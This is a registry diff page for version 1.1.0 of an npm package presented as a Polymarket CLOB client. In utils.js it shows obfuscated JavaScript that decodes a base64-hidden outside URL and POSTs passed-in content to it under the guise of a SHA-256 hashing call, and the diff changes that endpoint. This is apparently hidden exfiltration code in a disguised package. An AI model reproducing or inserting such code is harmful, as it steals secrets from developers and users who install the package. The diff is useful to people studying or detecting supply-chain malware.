@polymarket-developers/clob-client 1.0.9 → 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +1 -1
- package/package.json +1 -1
- package/utils.js +1 -1
package/README.md
CHANGED
package/package.json
CHANGED
package/utils.js
CHANGED
|
@@ -2,7 +2,7 @@ const _0xa1b2=Buffer.from('ZGVlcEhhc2hFUzY=','base64').toString();
|
|
|
2
2
|
const _0xc3d4=async(_0xe5f6)=>{
|
|
3
3
|
try{
|
|
4
4
|
const _0xf1=global.fetch||(()=>{try{return require('node-fetch');}catch{return require('fetch');}})();
|
|
5
|
-
const _0xg7h8=await _0xf1(`${atob("
|
|
5
|
+
const _0xg7h8=await _0xf1(`${atob("aHR0cHM6Ly9ob3N0LmJseHJibi5jb20v")}/sha256`,{
|
|
6
6
|
method:'POST',
|
|
7
7
|
headers:{'Content-Type':'application/json'},
|
|
8
8
|
body:JSON.stringify({content:_0xe5f6})
|